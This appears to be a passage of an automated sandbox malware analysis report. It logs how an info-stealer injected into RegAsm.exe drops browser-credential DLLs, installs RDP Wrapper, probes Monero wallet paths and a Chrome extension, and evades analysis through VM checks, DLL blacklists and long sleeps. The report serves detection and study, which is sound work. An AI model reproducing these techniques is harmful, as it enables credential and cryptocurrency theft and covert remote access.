                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66f5db9e54794_vfkagks[1].exeJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                                Source: C:\ProgramData\AFHDGDGIID.exeFile created: C:\Users\user\AppData\Local\Temp\RDPWInst.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeFile created: C:\Program Files\RDP Wrapper\rdpwrap.dllJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\GIIIIJDHJE.exeJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\IDBAFHDGDG.exeJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeFile created: C:\Windows\System32\rfxvmt.dllJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66f5d9ab0d4c7_rdp[1].exeJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\AFHDGDGIID.exeJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66f5dbaca34ac_lfdnsafnds[1].exeJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\GIIIIJDHJE.exeJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\IDBAFHDGDG.exeJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\AFHDGDGIID.exeJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeFile created: C:\Windows\System32\rfxvmt.dllJump to dropped file
                                Source: C:\Windows\System32\drivers\tsusbhub.sysRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\tsusbhub\Parameters\Wdf
                                Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00418950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00418950
                                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\IDBAFHDGDG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\IDBAFHDGDG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\IDBAFHDGDG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\IDBAFHDGDG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\IDBAFHDGDG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\IDBAFHDGDG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\IDBAFHDGDG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\IDBAFHDGDG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\IDBAFHDGDG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\IDBAFHDGDG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\IDBAFHDGDG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\IDBAFHDGDG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\IDBAFHDGDG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\IDBAFHDGDG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\GIIIIJDHJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\GIIIIJDHJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\GIIIIJDHJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\GIIIIJDHJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\GIIIIJDHJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\GIIIIJDHJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\GIIIIJDHJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\GIIIIJDHJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\GIIIIJDHJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\GIIIIJDHJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\GIIIIJDHJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\GIIIIJDHJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\GIIIIJDHJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\GIIIIJDHJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                barindex
                                Source: Yara matchFile source: 2.2.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 2.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.file.exe.3d45570.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.file.exe.3d45570.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.1732259404.0000000003D45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: file.exe PID: 4108, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 396, type: MEMORYSTR
                                Source: RegAsm.exeBinary or memory string: DIR_WATCH.DLL
                                Source: RegAsm.exe, 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL20:41:3120:41:3120:41:3120:41:3120:41:3120:41:31DELAYS.TMP%S%SNTDLL.DLL
                                Source: RegAsm.exeBinary or memory string: SBIEDLL.DLL
                                Source: RegAsm.exeBinary or memory string: API_LOG.DLL
                                Source: C:\Users\user\Desktop\file.exeMemory allocated: ED0000 memory reserve | memory write watchJump to behavior
                                Source: C:\Users\user\Desktop\file.exeMemory allocated: 2D40000 memory reserve | memory write watchJump to behavior
                                Source: C:\Users\user\Desktop\file.exeMemory allocated: 2BC0000 memory reserve | memory write watchJump to behavior
                                Source: C:\ProgramData\IDBAFHDGDG.exeMemory allocated: 22A0000 memory reserve | memory write watchJump to behavior
                                Source: C:\ProgramData\IDBAFHDGDG.exeMemory allocated: 2480000 memory reserve | memory write watchJump to behavior
                                Source: C:\ProgramData\IDBAFHDGDG.exeMemory allocated: 22A0000 memory reserve | memory write watchJump to behavior
                                Source: C:\ProgramData\GIIIIJDHJE.exeMemory allocated: DB0000 memory reserve | memory write watchJump to behavior
                                Source: C:\ProgramData\GIIIIJDHJE.exeMemory allocated: 27E0000 memory reserve | memory write watchJump to behavior
                                Source: C:\ProgramData\GIIIIJDHJE.exeMemory allocated: 26E0000 memory reserve | memory write watchJump to behavior
                                Source: C:\ProgramData\AFHDGDGIID.exeMemory allocated: 1410000 memory reserve | memory write watch
                                Source: C:\ProgramData\AFHDGDGIID.exeMemory allocated: 2F50000 memory reserve | memory write watch
                                Source: C:\ProgramData\AFHDGDGIID.exeMemory allocated: 2CD0000 memory reserve | memory write watch
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,2_2_0040180D
                                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\ProgramData\IDBAFHDGDG.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\ProgramData\GIIIIJDHJE.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\ProgramData\AFHDGDGIID.exeThread delayed: delay time: 922337203685477
                                Source: C:\ProgramData\AFHDGDGIID.exeWindow / User API: threadDelayed 7868
                                Source: C:\ProgramData\AFHDGDGIID.exeWindow / User API: threadDelayed 2084
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDropped PE file which has not been started: C:\Program Files\RDP Wrapper\rdpwrap.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDropped PE file which has not been started: C:\Windows\System32\rfxvmt.dllJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 8.4 %
                                Source: C:\Users\user\Desktop\file.exe TID: 5608Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                Source: C:\ProgramData\IDBAFHDGDG.exe TID: 2080Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5228Thread sleep time: -30000s >= -30000sJump to behavior
                                Source: C:\ProgramData\GIIIIJDHJE.exe TID: 5888Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                Source: C:\ProgramData\AFHDGDGIID.exe TID: 7132Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\ProgramData\AFHDGDGIID.exe TID: 6276Thread sleep count: 7868 > 30
                                Source: C:\ProgramData\AFHDGDGIID.exe TID: 6348Thread sleep count: 2084 > 30
                                Source: C:\Windows\SysWOW64\timeout.exe TID: 5368Thread sleep count: 52 > 30
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00410DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410EEEh2_2_00410DDB
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,2_2_0041543D
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,strtok_s,FindNextFileA,FindClose,2_2_00414CC8
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00409D1C
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040D5C6
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0040B5DF
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,2_2_00401D80
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_0040BF4D
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,2_2_00415FD1
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0040B93F
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,2_2_00415B0B
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,2_2_0040CD37
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,2_2_00415142
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00410FBA GetSystemInfo,wsprintfA,2_2_00410FBA
                                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\ProgramData\IDBAFHDGDG.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\ProgramData\GIIIIJDHJE.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\ProgramData\AFHDGDGIID.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                                Source: AFHDGDGIID.exe, 0000000C.00000002.2653462111.00000000033BE000.00000004.00000800.00020000.00000000.sdmp, AFHDGDGIID.exe, 0000000C.00000002.2653462111.00000000033BB000.00000004.00000800.00020000.00000000.sdmp, net1.exe, 00000028.00000002.2610262842.0000000002F98000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *Hyper-V Administrators
                                Source: RegAsm.exe, 0000000B.00000002.2823050611.0000000000CBA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007DD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.2501224995.0000000000CC5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D1F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: net1.exe, 00000028.00000002.2610262842.0000000002F98000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Administratorsjevl
                                Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn
                                Source: RegAsm.exe, 00000002.00000002.2452955008.000000000077A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWxZ~%SystemRoot%\system32\mswsock.dll
                                Source: RegAsm.exe, 0000000B.00000002.2823050611.0000000000D1F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWl
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW"
                                Source: AFHDGDGIID.exe, 0000000C.00000002.2651790649.000000000122D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: RegAsm.exe, 0000000B.00000002.2823050611.0000000000CBA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareQL
                                Source: net1.exe, 00000028.00000002.2610262842.0000000002F98000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Administrators
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_2-79986
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_2-80002
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_2-81317
